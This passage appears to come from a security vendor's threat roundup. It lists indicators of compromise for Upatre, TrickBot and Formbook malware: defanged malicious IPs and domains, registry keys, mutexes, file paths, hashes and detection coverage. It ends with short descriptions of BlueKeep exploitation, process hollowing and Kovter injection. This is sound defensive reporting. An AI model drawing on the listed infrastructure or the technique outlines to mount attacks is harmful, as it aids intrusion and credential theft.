`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IP8M1EE.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IPDP9E0.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$ISIYA4I.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IV54ALI.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWK2JPN.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IWYYKMD.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IXC3P46.txt` | 15
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$IZ7KADN.txt` | 15

*See JSON for more IOCs

#### File Hashes

```
00de6704e49ec7e8b570b95410704c0d3d81c727c688d06afe68e4f8f4e4b8e6
079ab9339f5b1ccf429dbf4426350c311adc6bdeeb3a003970d052088dcdaabf
4b7a8b7ffac89faa52034d12821a9e20bfd987adcdcbdba29d6daaca44ef9325
6352e2794884e3c090f6ec14ec8c870fdc6d4cde61f518c44ed5bae2916e67c8
69a0539a87e7a9fe382cf4c504c3d02bf6ee4cd6a5e20098ed619da8975480ee
70311b0da413a17ed6c5f300adcd7757301346300693823ba4e1e7845901c1b8
7f1a0f921a5132b1329dbdbfadc83eec6568ad151d1c33da89a4aaf0a5e5c0c2
a7ba5bb407c401764b9af3e22b005962431d5446f1c8ba468ab71a7ed1033299
b8dd6020265dc28fa74d1708e2238cc227791dace690699db22cbb3ba6c1d64c
bd9a8d8d2c8e1d426959e7022ecd26b7001998aba2617e13deac573d16208916
c7a8125f64e0c8d4133263f901855d1ef0ecea2e083c10782e4cfbbe8b334e79
dca1535c72840c4a47886ee0e23437fc560a4fea29c9c62f63a58726d21a565b
e010d87d8cb503b316a2dc3e064b99178b7040a213251ce49e58fd0d23c6cef5
eb6259dd5f1ed9540edc3e0e9944e08145b9514320cd65c26612b32b92fa6885
f347dc8de7cefff44e6127fcfd035c08d31439a6f4951dd92549bdd6400b60aa
```

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-iSEWTi-rpVg/XhjcrD5aDtI/AAAAAAAADGM/wcV-gUOAeTwYZKk76cr4_1rRZ7g0EpIuACLcBGAsYHQ/s1600/6352e2794884e3c090f6ec14ec8c870fdc6d4cde61f518c44ed5bae2916e67c8_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-xktgUep7xTY/Xhjcvqpc-fI/AAAAAAAADGQ/qLrAcuLsx1U9DPmJztz1Y9lWZr5NOs9BQCLcBGAsYHQ/s1600/6352e2794884e3c090f6ec14ec8c870fdc6d4cde61f518c44ed5bae2916e67c8_tg.png)

#### Umbrella

[Umbrella detection screenshot](https://1.bp.blogspot.com/-PY-NqSLRN40/Xhjc0iwNiCI/AAAAAAAADGU/s7jL0uMjsvsHxOCPIJ3ykkkSvyUkGv7BACLcBGAsYHQ/s1600/6352e2794884e3c090f6ec14ec8c870fdc6d4cde61f518c44ed5bae2916e67c8_umbrella.png)

* * *

### Win.Dropper.Upatre-7491797-0

#### Indicators of Compromise

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`93[.]185[.]4[.]90` | 25
`104[.]20[.]17[.]242` | 10
`98[.]214[.]11[.]253` | 6
`66[.]196[.]61[.]218` | 6
`98[.]246[.]210[.]27` | 6
`81[.]90[.]175[.]7` | 5
`216[.]16[.]93[.]250` | 5
`76[.]84[.]81[.]120` | 4
`217[.]168[.]210[.]122` | 4
`84[.]246[.]161[.]47` | 4
`85[.]135[.]104[.]170` | 3
`24[.]148[.]217[.]188` | 3
`81[.]93[.]205[.]251` | 3
`81[.]93[.]205[.]218` | 3
`62[.]204[.]250[.]26` | 3
`173[.]248[.]31[.]1` | 3
`87[.]249[.]142[.]189` | 2
`98[.]209[.]75[.]164` | 2
`194[.]228[.]203[.]19` | 2
`24[.]220[.]92[.]193` | 2
`176[.]36[.]251[.]208` | 2
`109[.]86[.]226[.]85` | 2
`95[.]143[.]141[.]50` | 2
`68[.]55[.]59[.]145` | 2
`188[.]255[.]239[.]34` | 2

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`icanhazip[.]com` | 25

Files and or directories created | Occurrences
---|---
`%TEMP%\tywy22.txt` | 24
`%TEMP%\tywyaven.exe` | 24
`%TEMP%\t4930.tmp` | 1
`%TEMP%\vimazet.exe` | 1

#### File Hashes

```
01152de6c7c348fa9716c3d760744689eb85386303593e6100f6532bd3fc2cb3
01cb3cbad05c3b0b186b604f32cb00a3ceced74ead26affe5b4fb1867d48be01
02f4933753d850d1774b56cbd35c994b6b7dd9b971fd45c34f5677f90b281b6a
062720c82d1bef7558b0a4675b9539a23afddf252ede24b5d54edfba2a758ca5
06f92e4b684161224f68388d8d4ca35d113682fadeb2e100072dfa8d43413101
09589d82d2f9460fe3d33b726794d41a93b672dbaed8e5f397350b7714649cd7
09f38837949bbee74dd5da5fce7a92d7f21168f7e43345bbd19f5cbfde8f6f69
0c45c58eab16df4d5bff14dad957f91d5785a09836560bc3bd681c27e012b1b8
0d774c5ac17521abec32a11e81317fed5f7c163d82ec7f9e1065c86834458cfe
0d90667089d17e2924b00e5207a357156e9076dfa3dab3f2e7dc5737135053a9
0e36b813e84b27ff1c1b770fffbf4175c7c39bbe499804c9c27565ed4a9518fa
0fa25c7c007f337ab5ba699a2611c47ff41a8ba74cb83fa1ffde097e7408f8ed
10c863059e4910501e1deea44279a5402e93796098230511c65be09f8f47eb82
1356d0345699b8766d5c8de5d61cb47fd63dc3f42fe2280a2c413a8d7f97c1c8
13f7895a32eb09a5016a408819dce9c95a4149888ad708c0232e0659e2ca06e3
14178c54d283e6579242e90df7c4dae8af71ff4594c834e3cc7a275588f561b7
14e727de9a56e79b9dcaf48cc9751d4cb447f16d839d705c628640857d0e6e13
1535d470effa0af601719b9ef64e615f321e4db52ee4b7bb05def6d501884fbc
16b232d226ca18447e1f1671538607fe5be412e935b930bcde73ff46e0b2890f
186a59f2954d3d213a26308386be80f2b503e08882324ab559490330700fc24a
1d2374db5ee92385e49fbaef9ef694361877cdffa4b51d8fd8d37e6272dfad57
1e1bdd6ddb3c256c79024eccdb2de6b0861a2a86e13f3f03cf1f378e2cdc9d36
1fcbef293371203729eca2c9491641a03b2330c9be11b438f84db0e996e5b78c
2119922518bc437c7d5fd7d7205929089a9ed9333cdff97bb214808f37e86dd7
211bdc6613fc3e691ac70d215a8a9edd5f0ebb85bb4f24d6e293fb21894a0b1b
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-Mn9zktFrhm0/XhjdGEPVDEI/AAAAAAAADGg/3oyOPAaQw2ERguOdIwbsRP6QPpF9bWjkgCLcBGAsYHQ/s1600/2119922518bc437c7d5fd7d7205929089a9ed9333cdff97bb214808f37e86dd7_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-9-Dz5v-Cwb0/XhjdJ5fMG5I/AAAAAAAADGk/M-zT2WDcOe0dvfCWXd_rw9yz0newX7v8gCLcBGAsYHQ/s1600/2119922518bc437c7d5fd7d7205929089a9ed9333cdff97bb214808f37e86dd7_tg.png)

* * *

### Win.Dropper.TrickBot-7490964-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PROFILELIST\S-1-5-21-2580483871-590521980-3826313501-500` Value Name: `RefCount` | 1

Mutexes | Occurrences
---|---
`Global\316D1C7871E10` | 22

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`181[.]113[.]28[.]146` | 5
`188[.]120[.]254[.]68` | 5
`195[.]123[.]220[.]178` | 5
`198[.]23[.]209[.]201` | 4
`104[.]20[.]17[.]242` | 3
`119[.]252[.]165[.]75` | 3
`78[.]24[.]223[.]88` | 3
`188[.]165[.]62[.]34` | 3
`164[.]68[.]120[.]60` | 3
`69[.]195[.]159[.]158` | 2
`190[.]214[.]13[.]2` | 2
`5[.]2[.]70[.]145` | 2
`185[.]213[.]20[.]246` | 2
`185[.]141[.]27[.]190` | 2
`185[.]177[.]59[.]163` | 2
`216[.]239[.]38[.]21` | 1
`200[.]21[.]51[.]38` | 1
`200[.]127[.]121[.]99` | 1
`181[.]129[.]104[.]139` | 1
`18[.]213[.]79[.]189` | 1
`45[.]125[.]1[.]34` | 1
`23[.]20[.]220[.]174` | 1
`45[.]137[.]151[.]198` | 1
`5[.]182[.]210[.]109` | 1
`51[.]89[.]115[.]124` | 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`icanhazip[.]com` | 3
`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 2
`checkip[.]amazonaws[.]com` | 2
`wtfismyip[.]com` | 2
`api[.]ip[.]sb` | 1
`ipinfo[.]io` | 1

Files and or directories created | Occurrences
---|---
`%System32%\Tasks\System Network Extensions` | 22
`%APPDATA%\adirecttools` | 22
`%APPDATA%\adirecttools\data` | 22
`%APPDATA%\adirecttools\settings.ini` | 22
`%APPDATA%\ADIRECTTOOLS\<original file name>.exe` | 22
`%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 21
`%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp` | 21
`%APPDATA%\adirecttools\Data\pwgrab64` | 1
`%APPDATA%\adirecttools\data\pwgrab64_configs\dpost` | 1
`%APPDATA%\adirecttools\69ab1bb7084669cf84cc43537b700264.exe` | 1
`%SystemRoot%\TEMP\~DF8EC46E2629511EB8.TMP` | 1
`%APPDATA%\adirecttools\runme.exe` | 1
`%SystemRoot%\TEMP\~DF5EC233074AA93A3C.TMP` | 1
`%SystemRoot%\TEMP\~DF4BEDA5BB57A455AF.TMP` | 1
`%SystemRoot%\TEMP\~DFCE2B4CA7595FDB1F.TMP` | 1
`%SystemRoot%\TEMP\~DF771B5AE6CE965D7A.TMP` | 1
`%SystemRoot%\TEMP\~DF21C4C13A90F8FECB.TMP` | 1
`%SystemRoot%\TEMP\~DF2EDE8F31D379304B.TMP` | 1
`%SystemRoot%\TEMP\~DF887620F0BF482816.TMP` | 1
`%SystemRoot%\TEMP\~DF6B5F6A59497674CC.TMP` | 1
`%SystemRoot%\TEMP\~DFA8D4CB1355CC2A5F.TMP` | 1
`%SystemRoot%\TEMP\~DF326643DA3623EF2B.TMP` | 1
`%SystemRoot%\TEMP\~DF2334856A166D2B71.TMP` | 1
`%SystemRoot%\TEMP\~DF862A67F04082D9B3.TMP` | 1
`%SystemRoot%\TEMP\~DFC53480C7F7651844.TMP` | 1

*See JSON for more IOCs

#### File Hashes

```
0245c1658f2c7d9989431954aeeae75907cd70d94d45137c6d03d1c77463779f
11a8ffc0df227cb681971a11904bf83d3a72a52aefd1335df4202115ccabe4a1
17db3888319bac8bdc2fa0c33c3125dca7f8b2f9ff39dfe8b16882c3babd5273
26e223b88abca88510d861698e8468675e7fc8fac1199a554d4fdd2cff91197d
4517232ad858b209e6a6fb873e2a8665a85c91506b1ded4c518e751fc7adacb2
65371d42ff1b2db3b211c5f180f411a2621679225dab602ed0d47a496287ff4c
691f1b9988bde02160172a8ed8d0e242cc25d8fd205839887140330ebff862f5
6b4f93bb3fc3aeb71591f7fd237367905898b62f3a08580d8ed691fa06f6734d
6e2ab21ca9e1bb545bee1a66190cd9786d9d2d376b47864715b121ed8ccb3d33
7055bef3d19a836529109b5037e4ce63e9f3c8d8f9e5b8daba57880b9ca5cb5e
7996ea4f4f2a2d9e2152eaefba2fc9077c33fc5a1848b2ec4e6a69e54ef7fba3
82aef9ea980b0fd2fb268be8fc8ebdf14b9150df5c167aa29ddcd464afc2014c
8d9c8ef971a707651456e085f7420e45463d77dbefeab733d381685500f4a027
9363001b83b189a7ebdefcebe844bbbe29e1db03e49fa642bc9530f345d65283
9971b48ee31acc1d33d3a28b3527f3039c5a633d0f0cb6b3422d3b1d219221f0
9e1d70348303b0480a64a03d82b2d011d1a51a5f106024e670f12acc64478b44
a6068b4a752629e61dff03d86cf8bf9141f52e22a8267c0de469fe5d2e5b65de
ae0e55999d7f5ae1be0a7132b2e972fc04c95c653f214f3f59ce30fc4e2f57af
b4c41107cda5716a098e22be19101e15e3e577e3d6cc8570a4e81e0f6cf24ae1
c693ddb405dcc6831f489f499ece83aae83d27226694bfc390b5059f0849bc2e
e0d95256f1587f75b9e0e632e92b88561d4441cb559d7b3944e3152669a28f92
ea15e0fd9d3c825cd2c2217ab150fb7cee86cf5b0a3e411c6c621084199bbb10
```

#### Coverage

Product | Protection
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | N/A
WSA | 

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-j8lSMaSSmnM/XhjdaOv8yMI/AAAAAAAADGw/2g6HdPtnEn0zqakL7AfaJ3IkwMX1k9b8QCLcBGAsYHQ/s1600/26e223b88abca88510d861698e8468675e7fc8fac1199a554d4fdd2cff91197d_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-tgyCpFzXjYc/XhjdhTDr-GI/AAAAAAAADG0/Q6zNLsnlYbEdg8U0Ik-snUyGQiiSOZ1vgCLcBGAsYHQ/s1600/4517232ad858b209e6a6fb873e2a8665a85c91506b1ded4c518e751fc7adacb2_tg.png)

* * *

### Win.Packed.Formbook-7491272-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\INTELLIFORMS\STORAGE2` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000001` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000002` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000003` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\0A0D020000000000C000000000000046` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\13DBB0C8AA05101A9BB000AA002FC45A` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\33FD244257221B4AA4A1D9E6CACF8474` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\3517490D76624C419A828607E2A54604` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\4C8F4917D8AB2943A2B2D4227B0585BF` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\5309EDC19DC6C14CBAD5BA06BDBDABD9` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\82FA2A40D311B5469A626349C16CE09B` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\8503020000000000C000000000000046` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9207F3E0A3B11019908B08002B2A56C2` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9E71065376EE7F459F30EA2534981B83` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\A88F7DCF2E30234E8288283D75A65EFB` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\C02EBC5353D9CD11975200AA004AE40E` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\D33FC3B19A738142B2FC0C56BD56AD8C` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\DDB0922FC50B8D42BE5A821EDE840761` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\DF18513432D1694F96E6423201804111` | 27
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\ECD15244C3E90A4FBD0588A41AB27C55` | 27
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\F86ED2903A4A11CFB57E524153480001 ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\{D9734F19-8CFB-411D-BC59-833E334FCB5E} ` | 27 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\\CALENDAR SUMMARY ` | 27 \nMutexes | Occurrences \n---|--- \n`8-3503835SZBFHHZ` | 29 \n`Startup_shellcode_006` | 29 \n`KN7MSAA2BUECxyHz` | 29 \n`S-1-5-21-2580483-10603632762720` | 21 \n`S-1-5-21-2580483-2008626601611` | 2 \n`S-1-5-21-2580483-1148626601611` | 1 \n`S-1-5-21-2580483-1464626601611` | 1 \n`S-1-5-21-2580483-2116626601611` | 1 \n`S-1-5-21-2580483-1392626601611` | 1 \n`S-1-5-21-2580483-1992626601611` | 1 \n`S-1-5-21-2580483-1380626601611` | 1 \n`S-1-5-21-2580483-584626601611` | 1 \n`S-1-5-21-2580483-1120626601611` | 1 \n`S-1-5-21-2580483-2100626601611` | 1 \n`S-1-5-21-2580483-1616626601611` | 1 \n`S-1-5-21-2580483-1012626601611` | 1 \n`S-1-5-21-2580483-972626601611` | 1 \n`S-1-5-21-2580483-1440626601611` | 1 \n`S-1-5-21-2580483-1460626601611` | 1 \n`S-1-5-21-2580483-956626601611` | 1 \n`S-1-5-21-2580483-1808626601611` | 1 \n`S-1-5-21-2580483-888626601611` | 1 \n`S-1-5-21-2580483-10203632762720` | 1 \n`S-1-5-21-2580483-2036626601611` | 1 \n`S-1-5-21-2580483-10843632762720` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`162[.]213[.]250[.]169` | 10 \n`173[.]0[.]50[.]210` | 6 \n`217[.]160[.]0[.]55` | 4 \n`192[.]155[.]190[.]84` | 3 \n`172[.]247[.]92[.]19` | 3 \n`199[.]59[.]136[.]230` | 3 \n`184[.]168[.]221[.]32` | 2 \n`198[.]54[.]117[.]216` | 2 \n`198[.]54[.]117[.]211` | 2 \n`23[.]20[.]239[.]12` | 2 \n`184[.]168[.]131[.]241` | 2 \n`217[.]160[.]0[.]154` | 2 \n`74[.]208[.]236[.]114` | 2 \n`199[.]59[.]138[.]230` | 2 \n`74[.]117[.]219[.]198` | 2 \n`198[.]54[.]117[.]218` | 1 \n`198[.]54[.]117[.]212` | 1 \n`198[.]54[.]117[.]215` | 1 \n`184[.]168[.]221[.]36` | 1 \n`185[.]230[.]60[.]195` | 1 \n`85[.]159[.]66[.]62` | 1 \n`97[.]74[.]42[.]79` | 1 \n`172[.]217[.]5[.]243` | 1 \n`208[.]100[.]26[.]245` | 1 \n`3[.]234[.]181[.]234` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]allixanes[.]com` | 10 \n`www[.]travelcards[.]site` | 6 \n`www[.]orlandohouston[.]com` | 5 \n`www[.]xn--4qw729d[.]com` | 5 \n`www[.]davekachman[.]com` | 5 \n`www[.]iqama[.]info` | 5 \n`www[.]reserveforcespolicy[.]com` | 5 \n`www[.]enjoquotes[.]com` | 4 \n`www[.]online-rfs-billing[.]info` | 4 \n`www[.]imtrainee[.]net` | 4 \n`www[.]ildolce[.]store` | 4 \n`www[.]elgranretodeseve[.]com` | 4 \n`www[.]arnaud4k[.]com` | 4 \n`www[.]digital-spot[.]net` | 4 \n`www[.]casalukre-co[.]com` | 3 \n`www[.]jingrunxuan[.]com` | 3 \n`www[.]hzwhedu[.]com` | 3 \n`www[.]zxhckj[.]com` | 3 \n`www[.]thehouseofthedrone[.]com` | 3 \n`www[.]24hourautolocksmith[.]company` | 3 \n`www[.]kingofthenorth[.]tech` | 3 \n`www[.]aurora-health-ua[.]com` | 3 \n`www[.]prokat[.]site` | 3 \n`www[.]riicko[.]com` | 3 \n`www[.]hugedomains[.]com` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\HJdyTuap.exe` | 29 \n`%APPDATA%\\KN7MSAA2` | 27 \n`%APPDATA%\\KN7MSAA2\\KN7log.ini` | 27 \n`%APPDATA%\\KN7MSAA2\\KN7logrc.ini` | 
27 \n`%APPDATA%\\KN7MSAA2\\KN7logri.ini` | 27 \n`%APPDATA%\\KN7MSAA2\\KN7logim.jpeg` | 26 \n`%APPDATA%\\KN7MSAA2\\KN7logrv.ini` | 26 \n`%ProgramFiles(x86)%\\Ygl8drb` | 1 \n`%ProgramFiles(x86)%\\Ygl8drb\\config9rs4ano.exe` | 1 \n`%TEMP%\\Ygl8drb` | 1 \n`%TEMP%\\Ygl8drb\\config9rs4ano.exe` | 1 \n`%ProgramFiles(x86)%\\Ymnlhitch` | 1 \n`%ProgramFiles(x86)%\\Ymnlhitch\\helpcfsd4ho.exe` | 1 \n`%TEMP%\\Ymnlhitch` | 1 \n`%TEMP%\\Ymnlhitch\\helpcfsd4ho.exe` | 1 \n`%ProgramFiles(x86)%\\Kpfyl` | 1 \n`%ProgramFiles(x86)%\\Kpfyl\\helpex9l_rep.exe` | 1 \n`%TEMP%\\Kpfyl` | 1 \n`%TEMP%\\Kpfyl\\helpex9l_rep.exe` | 1 \n`%ProgramFiles(x86)%\\Gbbcdufw` | 1 \n`%ProgramFiles(x86)%\\Gbbcdufw\\vgaxjwtjt.exe` | 1 \n`%TEMP%\\Gbbcdufw` | 1 \n`%TEMP%\\Gbbcdufw\\vgaxjwtjt.exe` | 1 \n`%ProgramFiles(x86)%\\L1b6h` | 1 \n`%ProgramFiles(x86)%\\L1b6h\\systrayybihc.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0146d4a89836ecc12759c33a85d60c3867a35b7ee468041fb26b0610ef76e54f 046bebb1052d11ee3db2b5c8cbf3e2f1dd509a2aa73e53f4ffb18d39985165cf 049fa135806899faa44ce50ba918331d0ea0aeb8aa6db5012117bfc794f57759 058392f97319e50bbd2172ab46255c892e12ee0b7948e6ce0420012eb85e7e35 07387a7c05fcaf63b03673bd92d634fcd13e1784fb6adcc6c2b8cf7154c07e55 07c11047e72c8f52c1f5c422fc5b7ed49225259012c813c2bc5a8827bcf5f752 0d49120f2ce8cc77ea769c79a1ab5c7669cb58c07de1a95f08549d2665529df1 0d8e415c487a6ced2680bcb31834fe282b914f09ac167dfb4f1685af0b529c35 0da9443c8aacb9e4757b81deeaeedc7b96766020522ed9992d7b9ce3e0eb5130 0de2930e0fd1d971aa98b219ce6dc3f36b07d8441b7abd0d663a63dd77cfbf37 163d07cf0a756800c6ce5be998331fdffa75081f5f669bbb6149eb0e89744043 1c64787e6ef766f7d9b8cc99deb128d45b89d02accacb3dac1e2ad076f5139eb 208a5ebc7af4b8d15e157e9115f4617a2b3e021a868367b3e7bb0bde69170911 2655a1ee89ed4101f552ce1b75b9d711ee5c6217e63cf6ce8e23086844c839e9 2a13033c3b6b7299bd795ce5c34bbba17a8de80d4d957e4d547ef1ae2ba728b4 2e98ffc7f5bab8e3f2085beba2ecc912f038c9a66a5f6b9ec7d8e0f2eca2fcbc 
2fb1d73ee16fea837612ff0d9c89a934e5520310f9a06397f7e2c1a0c1604694 30545b09c38a284d95310d71822427e0bc0b69dcaeb3d316f2fe39decfb8c006 3064e41052d6dfa7c354a6e8c405ae2c1d09e48fa9e82dc4e8faee1f4bebdd4d 352c218b502f9db9eb8a56d8d6515c3fbe51298e29fe3878731a037885dc7f7b 356aa1a0e39cd24ed61ca8c1d6658a91c9dd8dbd2663ce90b5db2b793fe12e01 36fd577a0a6354cae84ff7a6bc3b21159f24cd0b8eff3482ba7c8278b4a89b27 3a14a285394c39842beaf312d02de42ab02c679e47cb6a40c3b900f196ba4e2d 3aa7710feab8dd35997e03ad650a5bae2f19de1d82e2a7fef032815d946e21ee 3d2f8ca93b256a27067969eda8d4fca7559e38b8af59a79c40c40c55f06b53d2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-RA9_xnQV9F0/Xhjd0Mb1XQI/AAAAAAAADHA/hrVyQg73cnMOUokXZJMo0t0qDtc5eVyewCLcBGAsYHQ/s1600/058392f97319e50bbd2172ab46255c892e12ee0b7948e6ce0420012eb85e7e35_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ZAlk35HSJXQ/Xhjd_N1vrqI/AAAAAAAADHE/zkTyBAHh91UyJ00xgFzak1TIkKC_lk99gCLcBGAsYHQ/s1600/b59c555a9fb25b3a79b032de69b9bbe139e690b24a9932a8d994e97cd6d1c717_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-7cLfrrKNMm4/XhjesLzfyTI/AAAAAAAADHQ/2tURBJZ287cdWD5Y3STnHZrc7HTI-Yj2gCLcBGAsYHQ/s1600/9a3a60c34d4b618657bfabc843bfad0e944800e7587446a3786a85f96c16f45a_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. 
\nCVE-2019-0708 detected \\- (17518) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a use-after-free in the kernel-mode RDP driver (termdd.sys) that corrupts kernel pool memory; it can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request during connection setup. Because it is reachable before authentication and yields remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (353) \nProcess hollowing is a technique some programs use to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted payload is unpacked into memory. The parent then creates a legitimate child process in a suspended state, unmaps (hollows out) the child's original image, writes the unpacked payload into the freed address space, and resumes the child, so the payload runs under the name and path of the legitimate executable. \nKovter injection detected \\- (269) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected 